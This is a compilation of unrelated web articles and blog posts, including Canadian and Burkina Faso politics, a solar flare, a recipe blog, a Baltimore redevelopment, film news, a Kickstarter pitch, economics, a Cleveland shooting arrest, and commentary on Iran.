Non-true believers and swing voters inclined to give the new government a chance, out of simple fair-mindedness, will be looking for signals he means what he said about Conservatives being “not our enemies, but our neighbours.” The PM's offhand remark to the BBC last week, that his critics were “slightly bewildered,” as he “left them in the dust,” may be true. That doesn't make it wise to say so. From a leader holding a dominant hand, it comes off as arrogant, which is the Liberal party's ancient kryptonite. Trudeau will need at least grudging cooperation from non-partisans and fence-sitters when the time comes, for example, to reform the electoral system. He needs his critics now to help with refugee resettlement. Kicking sand in their faces won't win them over.
It's inevitable, given the high-profile round of travel in which the new PM, his staff and ministers were almost immediately swept up, that they should be a little gob-smacked and star-struck by the experience. Back in Canada, it's early December, it's dark, it's cold, and working stiffs still get up in the morning and drag themselves to jobs they don't love, and that don't allow the luxury of hired help. Something to remember.
This morning at 3:16 AM Eastern time a spot on the sun emitted its strongest flare of the year so far, and NASA's Solar Dynamics Observatory caught this image of it.
The flare was classified as an M6.5, not the most massive (those are X-class), but large enough that it caused a "moderate" radio blackout (level R2) that, according to NASA, "has since subsided." The Earth's atmosphere protects humans and other life on the planet from the radiation that solar flares emit.
Close-up view:
Update 2:26 pm: NASA has now additionally posted some information about a Coronal Mass Ejection associated with this morning's flare that left the sun at a speed of 600 mps* and could reach Earth in one to three days' time. Coronal Mass Ejections, or CMEs, are the release of charged solar particles into space and are what create the phenomenon known as aurorae at our planet's poles. The Solar Heliospheric Observatory (SOHO) captured a series of images of today's CME between 3:48 and 4:36 this morning (Eastern time). Mars is labeled at left.
*Correction: I accidentally had this originally as 600 mph, when I most definitely meant miles per *second*. Apologies for the error. Thanks to Cathey Thomas for pointing this out via email.
Clark has a really cool tattoo. Actually, he has three really cool tattoos. But it's one in particular that I'm referring to: his three little birds. For those who don't know, Bob Marley had a song called Three Little Birds. It has a peaceful rhythm and a catchy chorus. It's stuck in my head more often than not, probably because Clark is usually walking around whistling it.
The song's meaning, or what it means to me, is something that I need to apply to my life. Recipes like this are just the ticket.
Sometimes I feel like my head is going to explode. Like there is no way there should be this many ideas and thoughts and worries funneling through my neuro-pipelines at one time. It can't be healthy.
There's the blog, there's my job, there are my side gigs, there are friends and family. How does one measly 20-something find the time for it all? Yesterday I forgot my ID when I needed it to buy wine, the pair of boots that I drove 45 minutes to return, and my purse in the car when I went into the mall. Somebody pass the gingko biloba, please. I could've sworn my mind had another 60 good years left on it.
These phenomenon happens every so often and by now. It's like my pot bubbles up and boils over when I'm trying to do too much at once. I'm slowly realizing that the secret to keeping it together is to simplify when and where I can and to not worry about the rest. Don't worry. It seems simple enough, but it's a difficult task in itself. You have to consciously think about NOT thinking about stuff.
I always have the urge to come up with so many innovative dishes for the blog. A new take on something. A healthy version of a favorite. Oftentimes, this ends up being a complicated mess of stubborn. In my quest to come up with something “unique,” I am usually ignoring the fact that people love simple. Easy, accessible, healthy dishes that taste good have proven themselves to be this blog's home runs, time after time. Our most popular recipes? 5-Minute Alfredo Sauce, Sweet Potato Hash Browns, Easy Spaghetti Squash Pasta. Quick, simple, easy.
Once I forced the gears to slow down upstairs, I came up with this little gem of a recipe. I wanted a bunch of colorful, healthy veggies and I wanted them to look pretty – simple! A drizzle of oil, a handful of seasonings, and a strategic stacking. A few minutes later – savory roasted perfection. After being speared together and placed in the oven, everything cooks all at once and is done at the same time. Set it and forget it.
There was a little mess of veggies left over after making the stacks – those just went onto the baking sheet in a pile and made for delicious leftovers. Double win.
Simple works best. In blogging, in life, in relationships, in cooking.
There's something to Bob Marley's mantra “Don't worry 'bout a thing, 'cause every little thing is gonna be alright.” You can hear the song a thousand times, but that simple, 13-word phrase is powerful enough to change your whole way of life.
Do you have shoes on your feet? Clean water? A full fridge? A roof over your head? Good. Everything else is going to be alright. Shake off that one email that you forgot to reply to or that lunch date that you had to cancel. I'm reminding myself all of these things as I'm writing them down here, and I feel a little more mellow already.
Update (developing):"There will be no elections on October 11 unless a million Burkinabes are going to march and remove the military (who seized power in a coup overnight Sept 16-17) from power and frankly I don't see that happening," a highly-placed former presidential advisor in Burkina Faso told me Thursday evening in a telephone interview for this blog.
Military officials did not set a time for elections in the decree released shortly after seizing power Thursday; however, General Gilbert Diendere said on French television that he did not intend to stay in power indefinitely. State television later reported that the interim President and several ministers taken prisoner were being released. No mention was made of the fate of the interim Prime Minister, himself a member of the military.
Leading presidential candidate Roch Kabore's political party, the MPP, earlier issued a statement from the capital of Ouagadougou condemning the military actions and adding:
The Burkinabe people have already made huge sacrifices and paid the price in blood during the popular uprising of October 2014. As one, we must again mobilise to block the way of this new abuse of power which is a renewed attempt to reinstate the old order and resist the people's desire to establish democracy and justice….The MPP reiterates its support to the transitional government and calls upon its members and supporters, the people and friends of Burkina and the international community to mobilise for the defeat of this latest attempt to derail the democratic transition and achievements of our country.
Surrounded by Mali, the Cote d'Ivoire, Niger, Togo, Ghana and Benin in Western sub-Saharan Africa, the tiny nation of Burkina Faso is completely landlocked and - with a projected 2015 GDP of $15-Billion ($827 per capita) - ranks among the 20 poorest nations in the world. The country's 16.5-million inhabitants have scant access to adequate housing, health care, education, and jobs. Thousands of refugees from religious unrest in Mali have taxed the former French colony's already-meager resources. Despite international aid, the country lacks sufficient infrastructure and energy to conduct significant business with its neighboring countries.
In all of this, Roch Marc Christian Kabore sees not problems but possibilities. Which is a good thing, as Kabob is one of the two front-runners in the country's presidential elections set for October 11. It is an election that will test not just Burkina Faso, but the ability of popular politics to create political transformation.
Sharing The Wealth
“We need to create riches, through investment and development. But we must share that wealth,” Kaboré told me in an interview in Paris for this blog. “The three points which are most important to me are education, because that will allow us to transform the future; health care – not just hospitals, we need trained doctors, we need antiseptic facilities; and we need good governance – transparency, integrity in government.”
I am reminded that Burkina Faso translates as “Land of Men of Integrity,” the name created by one of the country's post-colonial political heroes, Thomas Sankara,, who remains an eminence grise on the political scene 29 years after his death - apparently at the hands of his former comrade and then successor Blaise Compaore who led Burkina Faso for 27 years until being ousted by a popular uprising in October of 2014.
It was Compaore's desire to change the constitution to allow him to extend his term yet again that led to his downfall. People had had enough – so much so that they recently eliminated two candidates deemed “too close” to Campaore and his Constitutional maneuver from the electoral roster..
“Compaore's ousting was a popular political movement, not a revolution,” says Businessman Serge Doh of Global Technology Partners Ltd, whose company provides pre-paid bank cards to countries in the region. ”Basically, the Burkinabes (the people of Burkina Faso) wanted Compaore out – 27years was enough; they want things to go back to being a normal Democracy, and they want open and transparent elections.”
For the last year, the country has had a care-taker government, with the President being a military Colonel and the Prime Minister a civilian lawyer in an attempt to limit any prolonged military dictatorship and ensure democratic elections as promised. The normal array of observers from the UN and other international organizations will be in attendance as voters choose among 14 candidates – two of whom are women.
The 58-year-old Kaboré himself was part of Compaore's government for more than two decades, serving, between 1989 and 2012 as Minister of Transport, Finance, International Relations, Prime Minister, then Special Advisor to the President and finally President of the National Assembly. In January of 2014, vehemently opposed to Compaore's desire to stay in power, he resigned and set up his own left-leaning political party – the MPP (People's Movement for Progress). He recently received the electoral backing of the country's Socialist Party. Yet, as a member of the important Mossi tribe, his origins are among the country's elite.
“We need more public-private partnerships, a place for the private sector to invest,” he says, revealing his origins as a private-sector banker before entering politics. And despite the country's meager GDP, its average GDP growth rate over five years has hovered near 7%. “Africa has potential. There is a lot to invest in here –the country needs everything: infrastructure, electricity, services. We use geothermal energy, but we should develop solar. We use petroleum lamps, when there should be electricity from solar panels which can then be distributed to everyone.“
Gold And Cotton
There's also gold (Burkina Faso is the world's third largest source of gold and accounts for 24% of GDP; South African, American, and Canadian companies are already mining in the country). “We could build ‘villages' for the people who work in these mines and their families,” Kaboré says. “They need better housing, schools, medical care.” And there's cotton – agriculture is 34% of the country's GDP. “Right now we export raw cotton,” Kaboré points out. “We should be exporting finished goods.”
It's a tall order for a country that is currently under military rule which everyone hopes will step aside as promised following the elections. This brings up parallels with the Arab Spring, and the “temporary” military rule that remains in several countries.
“The Arab Spring showed that people in North African countries had the same exasperation with government that we see here,” says Kaboré. ”But the difference is the maturation of sub-Saharan Africa, where we have had a more democratic process since the 1960s.” That's when the country shed the French colonial mantel it had worn since the end of the 19th century and became Upper Volta, becoming Burkina Faso in 1987.
“It's one thing to take everything apart,” Kaboré reflects, “but then you have to put it back together again so it becomes permanent. And for Africa to develop –politically economically, socially - you can't do it one country at a time. It has to be pan-African, with a united political will. It won't happen now; maybe with the next generation. But we have to start.”
This is the crux of the challenge facing African leaders: galvanizing change through popular politics to foster domestic development while building good relations among neighboring states... living under the same sky, learning to share the same horizon.
On this beautiful Mother's Day an email from the HispanicLibertarians Yahoo Group landed in my inbox. It was a post titled “Troops and Law enforcement officers say not on my watch!”. The entire post was this link, [link edited for length], the Oath Keepers website. At first glance I thought good for them this is a step in the right direction.
Unfortunately, further examination quickly revealed another side of this organization. While they advocate liberty and respect for the Constitution they also support the US government's imperial wars. It is not possible to be pro war and empire, on the one hand, and pro liberty at the same time. One must choose one or the other.
The pro war and pro empire side is revealed when one clicks on the links in the blog post, “Shout Our Oaths In The Tyrant's Face- Washington D.C., June 13, 2009“, a call to celebrate an alleged victory in Iraq. The first link is Gathering of Eagles. On their page titled Our Mission point number 9 states, “We will accept nothing less than total, unqualified victory in the current conflict. Surrender is not an option, nor is defeat.” The freedom hating Neoconservatives couldn't have said it better. The truth is that ending an aggressive war overseas isn't surrender or defeat, it is good sense. It is the only way to live in peace with the world.
(I will give them credit for one thing, point number 7 which reads, “We vehemently oppose the notion that it is possible to 'support the troops but not the war.' We are opposed to those groups who would claim support for the troops yet engage in behavior that is demeaning and abusive to the men and women who wear our nation's uniform.” This is quite true. It is the height of moral cowardice to proclaim support for the troops but oppose their mission. Those who oppose the war should do so completely and openly.)
Oath Keepers is missing a key point. The problem isn't that the military and police are being given the wrong orders, that's merely the symptom. The real problem is the fact that these organizations exist that allow such orders to be issued in the first place. I make this point about police powers in, “Drug Prohibition: Law Enforcement Is The Problem“.
The answer is not to take this oath, the answer is to resign from government service. I would remind readers that this would be emulating George Washington's resignation from and disbanding of the Army after the fighting in the Revolutionary War ended. He knew better than to have a standing army.
Let me conclude with some words of wisdom on the subject from the Founders:
It is certain, that all parts of Europe which are enslaved, have been enslaved by armies; and it is absolutely impossible, that any nation which keeps them amongst themselves can long preserve their liberties; nor can any nation perfectly lose their liberties who are without such guests: And yet, though all men see this, and at times confess it, yet all have joined in their turns, to bring this heavy evil upon themselves and their country.
Cato's Letters, No. 95: Further Reasonings against Standing Armies [September 22, 1722]
**************************
A standing military force, with an overgrown Executive will not long be safe companions to liberty. The means of defense against foreign danger, have been always the instruments of tyranny at home. Among the Romans it was a standing maxim to excite a war, whenever a revolt was apprehended. Throughout all Europe, the armies kept up under the pretext of defending, have enslaved the people.
–James Madison
*************************
“What, Sir, is the use of a militia? It is to prevent the establishment of a standing army, the bane of liberty …. Whenever Governments mean to invade the rights and liberties of the people, they always attempt to destroy the militia, in order to raise an army upon their ruins.”
— Rep. Elbridge Gerry of Massachusetts,
Floor debate over the Second Amendment [1789]
*************************
“I believe that banking institutions are more dangerous to our liberties than standing armies.”
Thomas Jefferson
*****************************
If we admit this consolidated government, it will be because we like a great splendid one. Some way or other we must be a great and mighty empire; we must have an army, a navy, and a number of things: When the American spirit was in its youth, the language of America was different: Liberty, Sir, was then the primary objectBut now, Sir, the American spirit, assisted by the ropes and chains of consolidation, is about to convert this country to a powerful and mighty empire.
Patrick Henry
*******************************
“Avoid the necessity of those overgrown military establishments which, under any form of government, are inauspicious to liberty, and which are to be regarded as particularly hostile to republican liberty.”
George Washington, Farewell Address [1796]
Four years after the Baltimore City Council approved a planned unit development for a Walmart-anchored shopping center in Remington, new owners of the site say they won't pursue the controversial 25th Street Station PUD, and will work with neighborhoods to develop a different mixed-used project.
But Evan Morville, a partner in Seawall Development Co., didn't rule oout that a Walmart could be included in a new plan, saying if the community wants it, "We would listen. All options are on the table."
Seawall and the Anderson Automotive Group announced Wednesday they have closed on the sale of six properties that Anderson owned in the area around 25th and Howard Streets. Settlement was Monday, according to Morville and Anderson Automotive Group president Bruce Mortimer.
They would not disclose the selling price.
Original developer, WV Urban Developments, had been hampered in its efforts to build 25th Street Station. Many residents opposed Walmart as an anchor, saying the big-box chain has a reputation of not paying fair wages and worrying the competition would drive out small businesses.
Some residents sued to stop the project, but others were more supportive, saying a center with a big box store was needed in North Baltimore.
WV pulled out of the long-stalled project in May, citing lawsuits and appeals since the City Council approved the PUD in 2010. Mortimer then turned to Seawall, which has redeveloped several old mills in the area as apartments and is now planning to redevelop the 2700-2800 blocks of Remington Avenue as a $51 million, mixed-use project called Remington Row.
Seawall must now decide how to develop the roughly 11-acre site south of 25th Street, a process Morville said would be based on "a collaborative process" with the communities of Remington, Charles Village and Old Goucher.
Morville said Seawall has no current vision for the site, other than as a mixed-used development.
Baltimore City Councilman Mary Pat Clarke said she welcomes Seawall's involvement and that the company was "very straightforward" in telling her and other elected officials that the process of planning and developing the site could take more than three years.
"I want to see something respectful of that community to the south" of 25th Street," she said.
He said the company will wait until its first priority, Remington Row, breaks ground by the end of the year before turning its attention to working with neighborhoods to develop the former Anderson site into "something we can all be proud of."
He also said he thinks the development of the Anderson site will complement Remington Row.
"I think they'll play off each other. They'll help support each other," he said.
Mortimer said he has no plans to get involved in planning for the development of the site unless his advice is sought. But he has agreed to relocate and consolidate his body shop on 29th Street to 25th Street, to help Seawall move forward with Remington Row more quickly.
"It helps me be more efficient and it helps (Seawall)," he said.
The properties that Seawall has purchased are:
• The old General Motors dealership site at 101-W. 25th St.
• The Anderson showroom at 204 W. Ware St.
• A storage lot, currently leased to a bus company, at 2500 Huntingdon Ave.
• A paint shop at 2520 Howard St.
• The Honda Service Center at 2507 N. Howard St.
• The 29th Street Body Shop at 301 W. 29th St. It will be relocated to the old GM site.
Clarke said she is pleased that Anderson "is putting its roots down in the community for the foreseeable future. It's a good business. (Mortimer has) always been a good community partner. And it's a lot of good jobs that stay in Baltimore."
"I think that's good news for the community," she said.
In effect, Seawall and the communities are starting from scratch with the Anderson properties.
"We're looking forward to the opportunity for a new slate and to work with the community on a new plan," Morville said. "We believe that the best thing to do is to start over and come up with a program that everyone can be happy with."
Said Mortimer, "Time will tell what's appropriate."
Whatever it ends up being, Remington will be the beneficiary, Morville said.
"This area is going to be totally different in 10 years," he said. "It's going to be a jewel in the heart of Baltimore."
* New movie tells how Enterprise crew mates got together
* Leonard ‘Spock' Nimoy tells old fans: ‘open your mind!'
By Frank Simons
LOS ANGELES, May 5 (Reuters) - When director J.J. Abrams dreamed up the new “Star Trek” movie, he took the prologue to the original television series to mind, and at least one key person approves — Mr. Logical himself, Spock.
For new “Trekkies” — and there will likely be many when the movie debuts in U.S. theaters on Friday — the 1960s TV show started with a prologue about the voyages of the starship Enterprise and its crew that would “boldly go where no (one) has gone before” in the “final frontier” of space.
To reignite the franchise that spawned five TV series and 10 movies over roughly 40 years, Abrams has done exactly that — gone where no other “Star Trek” storyteller had gone before — with a tale of how Captain James T. Kirk, Dr. “Bones” McCoy and the Vulcan Mr. Spock came to be shipmates.
But changing the “canon” — events and characters that shape “Star Trek” lore — could leave legions of old “Trekkies” thinking Abrams had done something “highly illogical,” as Spock might have once said. Old Spock Leonard Nimoy begs to differ.
“Canon is only important to certain people because they have to cling to their knowledge of the minutiae,” Nimoy told Reuters. “Open your mind! Be a ‘Star Trek' fan and open your mind and say, ‘Where does Star Trek want to take me now'.”
Where will audiences be taken? Backward is the way ahead.
They will learn confident Captain Kirk (Chris Pine) was a brawling bad boy from Iowa who joins the Star Fleet Academy, and beats the impossible “no win” simulator test that was dreamed up by the young and “logical” Spock (Zachary Quinto).
Together with crew mates McCoy, Nyota Uhura, Hikaru Sulu, Pavel Chekov and engineer Scotty, they board the Enterprise as young men and women on their first adventure in space.
The film, produced by Viacom Inc's VIAb.N Paramount pictures, moves at warp speed as the crew engages the villain Nero (Eric Bana) who has an eye for evil.
‘GREAT JOB,' SAYS SPOCK
Nimoy, 78, is the only actor from the original TV series and “Star Trek” movies to also claim a role in the new film, playing Spock Prime, who helps set in motion the new future.
He heaped praise on the 31-year-old Quinto for taking Spock in a new direction as he first despises Kirk then grows to have a grudging respect for the man that will become his captain.
“I couldn't have improved on what he did,” Nimoy said. “He did a great job, a great job, and I admire his choices.”
After more than 40 years, Nimoy seems to have reached a comfort level with the character from whom he once wanted to distance himself. Nimoy even wrote one book called “I Am Not Spock”, but later followed it with, “I Am Spock”.
Nimoy was “ready to play the wise old character that hands down some help and philosophy to the young people”, he said. “Settled, resolved, comfortable ... The Spock I played in this movie is pretty much me. Pretty much where I am in my life.”
Whether fans settle for the new “Star Trek” awaits Friday's debut, but among comments at www.trekspace.org was this from Ben J Grimm: “I simply REFUSE to support ParaMOUND in their DEGRADATION of my beloved STAR TREK.”
So “Grimm” may be disappointed in early reviews because “Star Trek” is winning raves. At review aggregator rottentomatoes.com, the movie rates a 100 percent positive.
The Hollywood Reporter says "all the familiar characters are instantly identifiable, the film gives Paramount Pictures a new lease of life on its franchise." (Editing by Bob Tourtellotte) (To read more about our entertainment news, visit our blog "Fan Fare" online at blogs.reuters.com/fanfare/)
Dear Backers,
It is truly incredible that so many people have come together to make this documentary possible. Thank you! Continue to support our Kickstarter campaign. All money raised over our $150,000 goal will go towards additional days of professional filming which will make our project even better. Pledge your support and spread the word!
Our Mission:
Unbranded aims to show the importance of conserving the vast open spaces in the American West, promote equine exploration, and demonstrate the incredible endurance of the American Mustang. A portion of the proceeds from the film will go to habitat based conservation groups and the Mustang Heritage Foundation.
About the Film:
Unbranded follows the story of Ben Masters, Thomas Glover, Jonny Fitzsimons and Ben Thamer as they ride 3,000 miles through the deepest backcountry of the American West, Mexico to Canada. The journey will take us more than six months through Arizona, Utah, Idaho, Wyoming and Montana, in famously rugged country such as Yellowstone, the Grand Canyon and Glacier National Park. Mustangs, born and raised in the wild, will be taking us on our journey. This is a story of the partnership between horse and rider, a testament to the hardiness of mustangs, and a tribute to the early explorers whose spirit remains today.
The documentary is already underway. We are currently filming the training of the mustangs and will shoot throughout the entire ride, from March 15th to September 20th. The final film will be 90-120 minutes of the best footage from the training and the trail. Unbranded will be a very beautiful, powerful and inspirational film.
The Ride:
Our route is the most backcountry route possible for horseback travel from Mexico to Canada. The route is custom but uses much of the Arizona Trail, the Great Western Trail and the Continental Divide Trail. We will travel through deserts, plains, foothills, canyons, mountains and alpine tundra. The trail will be as scenic as it is rugged.
The Horses:
Mustangs, born and raised in the wild, are the horses of choice for a trip of this magnitude. For more than 300 years, the ancestors of our mustangs have endured and thrived in the harsh landscapes we will be riding through. Their bloodlines trace back to early Spanish explorations and have been mingled with Indian ponies, cow ponies and early cavalry stock. Nature has bred them into tough footed, resilient and intelligent horses ideal for our trip. The mustangs we are using were rounded up by the Bureau of Land Management for population control. They were then sorted and shipped around the United States to different holding facilities. There are currently approximately 37,000 mustangs living in the wild. There are more than 43,000 living in holding facilities. They are waiting for an adopter. We will show that these horses are perfect trail horses and hope to inspire others to adopt a mustang. We are using 11 completely untouched mustangs that we adopted and trained with the help of professional trainers Jerry Jones and Lanny Leach. Jerry and Lanny are certified trainers through the Mustang Heritage Foundation's Trainer Incentive Program, an organization and program that helps find homes for mustangs. The remaining seven mustangs have been packing in the mountains for years and are proven, reliable stock.
The $150,000 Breakdown:
Commercial Filming Permits: 30k, Insurance: 20k, Production Equipment: 20k, Kickstarter's share and Incentives: 20k, Professional Cinematographers: 20k, Editing: 20k, Music: 5k, Advertising and Design: 5k, Transportation Costs: 5k.
Learn More:
Learn more about our trip by visiting our website www.unbrandedthefilm.com and follow us on Facebook www.facebook.com/unbrandedthefilm. Thanks for making this documentary possible!
Sample Photos:
Below are sample photos from a similar 2,000-mile trip Ben Masters completed in 2010 (the inspiration for this film).
It may be a long wait before we know which director and actress that Marvel Studios is seriously considering tackling its first female-led movie Captain Marvel given how long before it releases. However, Olivia Wilde and her Meadowland director, Reed Morano, have both thrown their names in the hat for the respective gigs. It all began on Twitter last week when a fan asked Marano if she would be up for helming the 2019 Marvel adaptation with Wilde as the leading lady, to which she replied, "Um...hell yes!" Olivia then responded, "Oh hell yea. Let's DO this! I'm starting my @Marvel diet immediately. Eggshells and jet fuel only, right? Who says indie kids can't go pro?!"
During a joint interview with Cinema Blend a couple days ago, both Olivia Wilde and Reed Morano had elaborated on the abovementioned Twitter conversation and even expressed some strong thoughts on how Marvel's female superheroes are being developed on the big-screen. "I'm a big fan of superhero films, and I have so much respect for the Marvel Cinematic Universe," said Wilde. "The thing with female superheroes is that, in order to be powerful, they are flawless. The idea of kick-ass power lacks a certain nuance, at times. There is something to be said for a female director working to create a female superhero that perhaps [has] a little more complexity."
Despite acknowledging the complex efforts that Marvel Studios has put forth with its few female superheroes such as Scarlett Johansson's Black Widow or Zoe Saldana's Gamora, Olivia Wilde further explained changes that need to be made. "Marvel has been so smart about casting unexpected people for these roles," she admitted. "Look at what Robert Downey brought to Iron Man. A real, dry sense of humor and a complexity to his hero balance. I think that the way these Marvel heroes are written, the female superheroes included, do have complexity and flaws. But I think when they are translated into film, the women can become these ultimate goddesses of perfection and I would love to create a female Marvel character who is just as unexpected and complex as some of the male characters as Iron Man. I think that would be really cool!"
As for Reed Morano, the filmmaker reveals that she has yet to receive a call from Marvel Studios after her Twitter exchange, but reassures she'd definitely be open to directing Carol Danvers' Captain Marvel cinematic debut. "The most interesting characters are the ones who have issues and are flawed individuals," said Morano. " It would be nice to give a real history, to give a real, tangible background to this character." Anyhow, the movie is set for release on March 8, 2019.
Inter legend Javier Zanetti has spoken about his career as well as talking about the current crop of players at the club.
The Argentine enjoyed a spectacular career at the Nerazzurri, a club where he spent nineteen years playing his trade.
“I had a long career because I love football. I did my job with great enthusiasm and professionalism, which is the most important thing for a player,” said Zanetti to Sina TV.
“I was the captain for Inter for a long time,” he added
“It was always an honor to wear the armband, now I try to teach all the members of the first team how to develop into greats based on my experiences.”
The retired full-back admitted that he received many lucrative offers from big clubs around Europe.
“I received many offers from some of Europe's best, but I always said that my intention was to remain at Inter because I wanted to create history with this jersey.
“The victory in the Champions League was a great dream that became a reality. That night in Madrid is something I will never forget, and it will remain in the hearts of our fans and especially in the history of Inter.”
The Inter vice president concluded by touching on Inter's current season.
“As for the current season, we are aware that we are lacking in a few things and there is a lot to do.
“Our goal was to return to the top and we're doing it.
“I hope that at the end of this season Inter finish strongly.”
Tada! I'm finally doneI've been wanting to do a painting of Ellen for a while now, but being afraid of not living up to her awesomeness (and having her hunting me down), I haven't.. before nowThough i was close to give up alot of times, i'm really proud of the result and quite happy about how it looks. (Just to brag I think the lips are the most realistic part of the painting, and i'm quite happy about how the eyebrows and eyelashes turned out (compared to other paintings xD ) )The hair was the most timecomsuming part of this painting (and the reason for me almost giving up) I didn't want it to look sort of "half way", and with my smart choice of lighting, the highlights and shadows was a nightmare.Please comment and tell me what you thinkTumblr post: [link] **As usual, Supernatural and characters belongs to Eric Kripke, artwork belongs to me ^^ feel free to download, or if you want, reblogg elsewherebut please give me credit and do not claim to own it yourself!Thanks
NEW YORK (Reuters) - Consumers will have to dig deeper into their pockets next year to pay for costlier healthcare, more expensive grocery bills and higher taxes, an extra drag on the country's already slow-moving economy.
A shopper walks down an aisle in a newly opened Walmart Neighborhood Market in Chicago in this September 21, 2011 file photo. REUTERS/Jim Young/Files
The additional outlays look set to test the resilience of consumers, whose spending accounts for around two-thirds of the U.S. economy.
“We think it's going to be a difficult six to nine months,” said Scott Hoyt, senior director of consumer economics for Moody's Analytics. “If anything, conditions are likely to get worse, particularly at the start of the year.”
The strength of consumer spending has surprised some economists, given unemployment near 8 percent and anemic wage growth. Consumer spending has cushioned the blow to the United States from slower foreign demand for its goods.
U.S. households have shed about $880 billion in debt since the peak in the first quarter of 2008, according to Federal Reserve data. That has put many consumers on a path back to financial health.
But an expiration of payroll tax cuts in early January and a spike in food prices could wipe 0.8 percentage points off U.S. economic growth next year, according to some economists.
The economy is now expected to expand 2 percent in 2013, down from 2.1 percent in 2012, a Reuters poll showed.
Consumer groups are noting caution on the part of households when it comes to such things as taking on more debt, retirement savings and gasoline prices.
“People are very concerned about what is going to happen next year because they are already seeing price increases that are affecting their budgets,” said Bruce McClary, a spokesman for Clear Point, a nationwide credit counseling organization that helps consumers experiencing problems with debt.
“They are also worried about any kind of changes that might be happening with regard to their income tax, that they are going to have less disposable income to work with,” he said.
Economists at JPMorgan say expiration in January of a temporary 2 percentage-point cut in the payroll tax would reduce household spending by $125 billion and lower gross domestic product by about 0.6 percentage point next year.
Still, loss of the payroll tax cuts would be only one aspect of the “fiscal cliff,” a popular name for automatic across-the-board spending cuts and tax increases that would suck about $600 billion out of the economy next year.
U.S. lawmakers are expected to find a way to soften the blow of most scheduled tax hikes, including income taxes, and spending cuts due to take effect from January 1. But if they don't, the tax increases and spending cuts could result in the most severe belt-tightening in the United States since a tax increase in 1969 to pay for the Vietnam War.
FOOD, HEALTHCARE, EDUCATION
Another area of concern for consumers is food prices. Rises in the prices of corn and soybeans and other field crops as a result of drought this year in the U.S. Midwest are expected to feed through into food prices late this year and in early 2013.
U.S. soybean prices jumped 40 percent over the summer, while wheat shot up about 50 percent. Prices have eased a bit since then, but the increases are expected to filter down to consumers.
“We are starting to see evidence of food prices moving up so that's definitely going to be a drag on disposable incomes,” said Hoyt of Moody's Analytics.
The U.S. Department of Agriculture sees food price increases of 3.5 percent to 4.0 percent next year, greater than this year.
Hoyt says that could cut 0.2 percentage point from economic growth over the winter, when food prices could peak.
Reflecting the strain on many budgets, U.S. shoppers plan to spend an average of about $750 on gifts, decorations and other holiday items this season, only 1.2 percent more than a year ago, according to a recent survey published by the National Retail Federation.
That would be the smallest increase since 2008-2009, when holiday sales fell 1.8 percent during the financial meltdown.
“You could argue that we are still at recession levels on a lot of the consumer indicators,” said Jeffrey Cleveland, a senior economist at investments manager Payden & Rygel in Los Angeles. “I don't expect the consumer to be a powerhouse.”
Another big extra outlay will be in healthcare premiums, which on average are costing employees more than $2,200 in 2012, according to Aon Hewitt, a human resource consulting firm.
Average health care premiums are forecast to jump by 6.3 percent in 2013, according to Aon Hewitt
Over the last five years, employees' share of healthcare costs will have increased more than 50 percent, it said.
On top of everything else, the cost of a college education is being felt more keenly by many Americans.
Tuition costs for the 2012-13 academic year rose again but federal grant aid and tax benefits did not increase in the previous year - the most recent for which data is available - according to a report published on Wednesday by the College Board Advocacy & Policy Center.
The pain of higher living costs is not being felt evenly.
Households with incomes under $75,000, people older than 50 and those with lower levels of education believe their financial positions are getting worse, according to a survey by Bankrate.com, a research firm specialized in consumer finance.
“A lot of lows- and middle-income households are mired with a stagnant income at a time when food and energy costs keep moving higher,” said Greg McBride, a senior financial analyst at Bankrate.com.
New York Times stock is up more than 70 percent since the election and just hit a nine-year high 5:18 PM ET Thu, 27 July 2017 | 00:42
After posting strong earnings Thursday, The New York Times Company shares have surged to a nine-year high.
The company has seen a sharp increase in digital subscriptions, largely attributed to the "Trump effect," since last November's election.
In part thanks to the digital subscriptions, the company reported profit as $27.7 million in the second quarter, up from $9.1 million in the same period last year.
Shares are up almost four percent in trading Thursday to their highest levels since April 2008. Since the election, the stock has jumped more than 70 percent on the back of an increase in digital subscribers as well as higher digital advertising revenue.
For the second quarter, the company reported 93,000 net digital-only subscribers, a 46 percent increase compared with a year ago.
Digital advertising revenue increased 23 percent to $55 million while print advertising revenue fell 11 percent to $77 million.
Newspapers and magazines across the country have reported increases in subscriber numbers and advertising revenue since the election.
In 2017 so far, New York Times is up 43.22 percent, compared to 10.85 percent for the S&P 500.
CLEVELAND, Ohio -- A 23-year-old Warrensville Heights man was taken into custody in connection to the drive-by shooting that killed 3-year-old Major Howard.
Cleveland police obtained an arrest warrant Tuesday morning charging Aaron Dunnings in the boy's death.
Members of the Northern Ohio Violent Fugitive Task Force arrested him the same morning on the 700 block of East 90th Street in Cleveland, according to Cleveland police spokeswoman Sgt. Jennifer Ciaccia.
Dunnings faces a charge of aggravated murder in the Sept. 15 shooting.
Authorities are still searching for Donnell Lindsey who investigators think was also involved in the shooting.
The pair is accused of firing a barrage of shots that killed Major and injured another woman.
Major, the woman and another man were sitting in a parked car on East 113th Street near Union Avenue when the shooting happened. A light-colored sedan pulled alongside their car, and someone inside the sedan opened fire, witnesses said.
Previous coverage: 3-year-old boy killed
Major was shot once in the chest and the 24-year-old woman was shot in the thigh.
The driver, who was not injured, drove the victims to Cleveland Clinic. The victims were then flown to MetroHealth Medical Center, where the boy died.
Investigators have tied the shooting to an East Side street gang called 103 Murdablock. Police say that gang is at war with the neighboring Benham Boys gang.
Dunnings was convicted of carrying concealed weapons in Cleveland in 2012, according to records from the Cuyahoga County Court of Common Pleas. He served an 18-month prison sentence at the Lorain Correctional Institution.
Dunnings' other past convictions include drug trafficking, drug possession and attempting to convey weapons, drugs or other prohibited items onto the grounds of a detention facility or institution.
However, let's for a moment accept that the U.S.' and Israel's claims that the use of force against Iran is justified are accurate. In other words, that the threat posed by Iran to Israel and United States satisfies the conditions required to justify preemptive use of force. The point of the thought experiment is this: if we accept such a ludicrous standard governing the use of force, we cannot help but conclude that Iran has a right to send planes to bomb Jerusalem and Washington tomorrow.
The case for attacking Iran essentially rests on two main contentions: that Iran is developing nuclear weapons and that, once it has them, it will use them against Israel (either directly or through Hizbullah). I will not discuss the accuracy of the first assertion here; suffice to say that both the CIA and the IAEA (.pdf) disagree. In any event, even if we accept that Iran is developing nuclear weapons, that would not qualify for a preemptive strike, even under the ridiculous standards of Israel and the United States. If it did, we would be forced to conclude that the majority of the states on the planet (including Iran) have a right to attack America, Israel, France, Britain, India and the other members of the ‘nuclear club'.
